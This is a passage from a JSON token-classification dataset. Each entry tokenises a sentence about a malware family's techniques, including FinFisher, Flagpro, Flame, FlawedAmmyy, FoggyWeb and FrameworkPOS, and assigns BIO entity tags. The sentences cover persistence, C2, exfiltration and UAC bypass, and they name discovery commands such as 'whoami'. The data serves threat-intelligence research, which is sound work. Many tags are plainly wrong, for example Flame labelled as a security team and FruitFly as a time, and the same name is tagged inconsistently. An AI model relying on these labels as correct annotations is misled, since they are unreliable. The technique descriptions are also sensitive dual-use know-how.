"O", "O", "B-SamFile" ] }, { "tokens": [ "FinFisher", "takes", "a", "screenshot", "of", "the", "screen", "and", "displays", "it", "on", "top", "of", "all", "other", "windows", "for", "few", "seconds", "in", "an", "apparent", "attempt", "to", "hide", "some", "messages", "showed", "by", "the", "system", "during", "the", "setup", "process." ], "ner_tags": [ "B-Org", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "probes", "the", "system", "to", "check", "for", "antimalware", "processes." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "FinFisher", "variant", "uses", "a", "custom", "packer." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "FinFisher", "obtains", "the", "hardware", "device", "list", "and", "checks", "if", "the", "MD5", "of", "the", "vendor", "ID", "is", "equal", "to", "a", "predefined", "list", "in", "order", "to", "check", "for", "sandbox/virtualized", "environments." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "checks", "if", "the", "victim", "OS", "is", "32", "or", "64-bit." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "uses", "token", "manipulation", "with", "NtFilterToken", "as", "part", "of", "UAC", "bypass." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FinFisher", "creates", "a", "new", "Windows", "service", "with", "the", "malicious", "executable", "for", "persistence." ], "ner_tags": [ "B-Org", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "uses", "Python", "code", "to", "deobfuscate", "base64-encoded", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "obfuscates", "strings", "with", "base64", "encoding." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "obtains", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "creates", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "obtains", "victim", "Microsoft", "Windows", "version", "information", "and", "CPU", "architecture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Final1stspy", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "check", "the", "name", "of", "the", "window", "displayed", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "collect", "data", "from", "a", "compromised", "host,", "including", "Windows", "authentication", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "exfiltrated", "data", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "close", "specific", "Windows", "Security", "and", "Internet", "Explorer", "dialog", "boxes", "to", "mask", "external", "connections." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Flagpro", "can", "download", "additional", "malware", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "execute", "the", "<code>net", "localgroup", "administrators</code>", "command", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "relied", "on", "users", "clicking", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Flagpro", "can", "download", "malicious", "files", "with", "a", ".tmp", "extension", "and", "append", "them", "with", ".exe", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "use", "Native", "API", "to", "enable", "obfuscation", "including", "`GetLastError`", "and", "`GetTickCount`." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "execute", "`net", "view`", "to", "discover", "mapped", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "delivered", "within", "ZIP", "or", "RAR", "password-protected", "archived", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "run", "the", "<code>tasklist</code>", "command", "on", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "dropped", "an", "executable", "file", "to", "the", "startup", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "execute", "<code>net", "view</code>", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "the", "ability", "to", "wait", "for", "a", "specified", "time", "interval", "between", "communicating", "with", "and", "executing", "commands", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "distributed", "via", "spearphishing", "as", "an", "email", "attachment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "encoded", "bidirectional", "data", "communications", "between", "a", "target", "system", "and", "C2", "server", "using", "Base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "check", "whether", "the", "target", "system", "is", "using", "Japanese,", "Taiwanese,", "or", "English", "through", "detection", "of", "specific", "Windows", "Security", "and", "Internet", "Explorer", "dialog." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "execute", "the", "<code>ipconfig", "/all</code>", "command", "on", "a", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "execute", "<code>netstat", "-ano</code>", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "has", "been", "used", "to", "run", "the", "<code>whoami</code>", "command", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Flagpro", "can", "execute", "malicious", "VBA", "macros", "embedded", "in", ".xlsm", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Flagpro", "can", "communicate", "with", "its", "C2", "using", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Flagpro", "can", "use", "`cmd.exe`", "to", "execute", "commands", "received", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "can", "record", "audio", "using", "any", "existing", "hardware", "recording", "devices." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "can", "use", "Windows", "Authentication", "Packages", "for", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Tool", "B-Exp", "B-Tool", "O", "O" ] }, { "tokens": [ "Flame", "has", "a", "module", "named", "BeetleJuice", "that", "contains", "Bluetooth", "functionality", "that", "may", "be", "used", "in", "different", "ways,", "including", "transmitting", "encoded", "information", "from", "the", "infected", "system", "over", "the", "Bluetooth", "protocol,", "acting", "as", "a", "Bluetooth", "beacon,", "and", "identifying", "other", "Bluetooth", "devices", "in", "the", "vicinity." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "can", "use", "MS10-061", "to", "exploit", "a", "print", "spooler", "vulnerability", "in", "a", "remote", "system", "with", "a", "shared", "printer", "in", "order", "to", "move", "laterally." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "I-Exp", "O", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "can", "create", "backdoor", "accounts", "with", "login", "“HelpAssistant”", "on", "domain", "connected", "systems", "if", "appropriate", "rights", "are", "available." ], "ner_tags": [ "B-HackOrg", "O", "B-Purp", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "contains", "modules", "to", "infect", "USB", "sticks", "and", "spread", "laterally", "to", "other", "Windows", "systems", "the", "stick", "is", "plugged", "into", "using", "Autorun", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rundll32.exe", "is", "used", "as", "a", "way", "of", "executing", "Flame", "at", "the", "command-line." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "can", "take", "regular", "screenshots", "when", "certain", "applications", "are", "open", "that", "are", "sent", "to", "the", "command", "and", "control", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Flame", "identifies", "security", "software", "such", "as", "antivirus", "through", "the", "Security", "module." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "collect", "clipboard", "data." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "FlawedAmmyy", "may", "obfuscate", "portions", "of", "the", "initial", "C2", "handshake." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "collected", "information", "and", "files", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "sent", "data", "collected", "from", "a", "compromised", "host", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "execute", "batch", "scripts", "to", "delete", "files." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "transfer", "files", "from", "C2." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "collect", "mouse", "events." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "collect", "keyboard", "events." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "FlawedAmmyy", "enumerates", "the", "privilege", "level", "of", "the", "victim", "during", "the", "initial", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "been", "installed", "via", "`msiexec.exe`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FlawedAmmyy", "will", "attempt", "to", "detect", "if", "a", "usable", "smart", "card", "is", "current", "inserted", "into", "a", "card", "reader." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "used", "PowerShell", "to", "execute", "commands." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "established", "persistence", "via", "the", "`HKCU\\SOFTWARE\\microsoft\\windows\\currentversion\\run`", "registry", "key." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "used", "`rundll32`", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "capture", "screenshots." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "FlawedAmmyy", "will", "attempt", "to", "detect", "anti-virus", "products", "during", "the", "initial", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "used", "SEAL", "encryption", "during", "the", "initial", "C2", "handshake." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "can", "collect", "the", "victim's", "operating", "system", "and", "computer", "name", "during", "the", "initial", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "enumerates", "the", "current", "user", "during", "the", "initial", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "has", "used", "`cmd`", "to", "execute", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedAmmyy", "leverages", "WMI", "to", "enumerate", "anti-virus", "on", "the", "victim." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FlawedGrace", "encrypts", "its", "C2", "configuration", "files", "with", "AES", "in", "CBC", "mode." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "use", "a", "dynamic", "XOR", "key", "and", "a", "custom", "XOR", "methodology", "to", "encode", "data", "before", "exfiltration.", "Also,", "FoggyWeb", "can", "encode", "C2", "command", "output", "within", "a", "legitimate", "WebP", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "invoke", "the", "`Common.Compress`", "method", "to", "compress", "data", "with", "the", "C#", "GZipStream", "compression", "class." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "compile", "and", "execute", "source", "code", "sent", "to", "the", "compromised", "AD", "FS", "server", "via", "a", "specific", "HTTP", "POST." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "has", "used", "DLL", "Search", "Order", "Hijacking", "to", "load", "malicious", "code", "instead", "of", "the", "legitimate", "`version.dll`", "during", "the", "`Microsoft.IdentityServer.ServiceHost.exe`", "execution", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "retrieve", "configuration", "data", "from", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "be", "decrypted", "in", "memory", "using", "a", "Lightweight", "Encryption", "Algorithm", "(LEA)-128", "key", "and", "decoded", "using", "a", "XOR", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "has", "been", "XOR-encoded." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "remotely", "exfiltrate", "sensitive", "information", "from", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "can", "check", "for", "the", "FoggyWeb", "backdoor", ".pri", "file", "on", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "receive", "additional", "malicious", "components", "from", "an", "actor", "controlled", "C2", "server", "and", "execute", "them", "on", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "masquerade", "the", "output", "of", "C2", "commands", "as", "a", "fake,", "but", "legitimately", "formatted", "WebP", "file." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "be", "disguised", "as", "a", "Visual", "Studio", "file", "such", "as", "`Windows.Data.TimeZones.zh-PH.pri`", "to", "evade", "detection.", "Also,", "FoggyWeb's", "loader", "can", "mimic", "a", "genuine", "`dll`", "file", "that", "carries", "out", "the", "same", "import", "functions", "as", "the", "legitimate", "Windows", "`version.dll`", "file." ], "ner_tags": [ "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "B-Features", "B-Way", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "can", "use", "API", "functions", "to", "load", "the", "FoggyWeb", "backdoor", "into", "the", "same", "Application", "Domain", "within", "which", "the", "legitimate", "AD", "FS", "managed", "code", "is", "executed." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "configure", "custom", "listeners", "to", "passively", "monitor", "all", "incoming", "HTTP", "GET", "and", "POST", "requests", "sent", "to", "the", "AD", "FS", "server", "from", "the", "intranet/internet", "and", "intercept", "HTTP", "requests", "that", "match", "the", "custom", "URI", "patterns", "defined", "by", "the", "actor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "retrieve", "token", "signing", "certificates", "and", "token", "decryption", "certificates", "from", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "B-Features", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "can", "enumerate", "all", "Common", "Language", "Runtimes", "(CLRs)", "and", "running", "Application", "Domains", "in", "the", "compromised", "AD", "FS", "server's", "<code>Microsoft.IdentityServer.ServiceHost.exe</code>", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "has", "reflectively", "loaded", ".NET-based", "assembly/payloads", "into", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb's", "loader", "can", "call", "the", "<code>load()</code>", "function", "to", "load", "the", "FoggyWeb", "dll", "into", "an", "Application", "Domain", "on", "a", "compromised", "AD", "FS", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "has", "used", "a", "dynamic", "XOR", "key", "and", "custom", "XOR", "methodology", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "can", "allow", "abuse", "of", "a", "compromised", "AD", "FS", "server's", "SAML", "token." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FoggyWeb", "has", "the", "ability", "to", "communicate", "with", "C2", "servers", "over", "HTTP", "GET/POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Forfiles", "can", "be", "used", "to", "act", "on", "(ex:", "copy,", "move,", "etc.)", "files/directories", "in", "a", "system", "during", "(ex:", "copy", "files", "into", "a", "staging", "area", "before)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Forfiles", "can", "be", "used", "to", "locate", "certain", "types", "of", "files/directories", "in", "a", "system.(ex:", "locate", "all", "files", "with", "a", "specific", "extension,", "name,", "and/or", "age)" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Forfiles", "can", "be", "used", "to", "subvert", "controls", "and", "possibly", "conceal", "command", "execution", "by", "not", "directly", "invoking", "cmd." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FrameworkPOS", "can", "XOR", "credit", "card", "information", "before", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FrameworkPOS", "can", "collect", "elements", "related", "to", "credit", "card", "data", "from", "process", "memory." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FrameworkPOS", "can", "use", "DNS", "tunneling", "for", "exfiltration", "of", "credit", "card", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FrameworkPOS", "can", "identifiy", "payment", "card", "track", "data", "on", "the", "victim", "and", "copy", "it", "to", "a", "local", "file", "in", "a", "subdirectory", "of", "C:\\Windows\\." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FrameworkPOS", "can", "enumerate", "and", "exclude", "selected", "processes", "on", "a", "compromised", "host", "to", "speed", "execution", "of", "memory", "scraping." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FruitFly", "executes", "and", "stores", "obfuscated", "Perl", "scripts." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FruitFly", "will", "delete", "files", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FruitFly", "looks", "for", "specific", "files", "and", "file", "types." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FruitFly", "saves", "itself", "with", "a", "leading", "\".\"", "to", "make", "it", "a", "hidden", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FruitFly", "persists", "via", "a", "Launch", "Agent." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "FruitFly", "has", "the", "ability", "to", "list", "processes", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FruitFly", "takes", "screenshots", "of", "the", "user's", "desktop." ], "ner_tags": [ "B-Way", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "the", "ability", "to", "discover", "application", "windows", "via", "execution", "of", "`EnumWindows`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "compressed", "collected", "files", "with", "zLib", "and", "encrypted", "them", "using", "an", "XOR", "operation", "with", "the", "string", "key", "from", "the", "command", "line", "or", "`qwerasdf`", "if", "the", "command", "line", "argument", "doesn’t", "contain", "the", "key.", "File", "names", "are", "obfuscated", "using", "XOR", "with", "the", "same", "key", "as", "the", "compressed", "file", "content." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "compressed", "collected", "files", "with", "zLib." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FunnyDream", "can", "monitor", "files", "for", "changes", "and", "automatically", "collect", "them." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "com", "objects", "identified", "with", "`CLSID_ShellLink`(`IShellLink`", "and", "`IPersistFile`)", "and", "`WScript.Shell`(`RegWrite`", "method)", "to", "enable", "persistence", "mechanisms." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "send", "compressed", "and", "obfuscated", "packets", "to", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "upload", "files", "from", "victims'", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "The", "FunnyDream", "FilePakMonitor", "component", "has", "the", "ability", "to", "collect", "files", "from", "removable", "devices." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "The", "FunnyDream", "FilepakMonitor", "component", "can", "inject", "into", 